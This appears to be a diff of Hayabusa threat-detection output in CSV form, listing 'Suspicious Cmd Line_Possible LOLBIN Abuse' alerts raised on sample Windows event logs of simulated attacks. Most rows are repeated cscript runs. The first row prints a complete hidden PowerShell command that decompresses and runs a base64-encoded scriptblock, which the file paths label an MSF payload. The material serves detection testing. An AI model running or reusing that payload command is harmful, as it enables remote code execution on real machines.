+2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
